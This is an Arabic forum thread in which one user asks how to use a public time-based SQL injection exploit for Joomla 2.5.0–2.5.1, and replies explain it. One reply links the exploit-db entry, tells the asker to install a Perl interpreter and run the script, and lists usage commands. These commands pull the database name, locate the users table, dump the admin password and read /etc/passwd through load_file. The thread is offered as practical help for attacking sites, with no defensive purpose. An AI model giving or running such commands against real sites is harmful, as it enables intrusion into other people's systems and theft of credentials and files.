شرح ثغره
 

السلام عليكم

مطلوب شرح الثغره الجديده
Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit

رد: شرح ثغره
 

التغره بلغه البيرل
استخدم مترجم بيرل

رد: شرح ثغره
 

وعليكم السلام ورحمه الله وبركاته.

هذه هي الثغرة لم تقم بوضع رابطها :

http://www.exploit-db.com/exploits/18618/

كما تلاحظ الثغرة مكتوبة بلغة البيرل تحتاج لمترجم البيرل بجهازك لكي تستطيع إستثمار الثغرة.

لتحميل مترجم البيرل من موقعه الرسمي :

http://www.activestate.com/activeperl/downloads

بعد ذلك تذهب إلى شاشة الدوس وتذهب لمسار الملف وتنفذ الأمر ك

perl 18618.pl

سوف يأتيك الشرح لكيفية التشغيل :

examples:
get admin password:
18618.pl http://host/joomla/ 3 'database()'
18618.pl http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema="joomla" and table_name like "%25_users"'
18618.pl http://host/joomla/ 3 'select password from zzzz_users limit 1'
get file /etc/passwd
18618.pl http://host/joomla/ 3 'load_file("/etc/passwd")'


الثغرة ليست بتلك الخطورة ,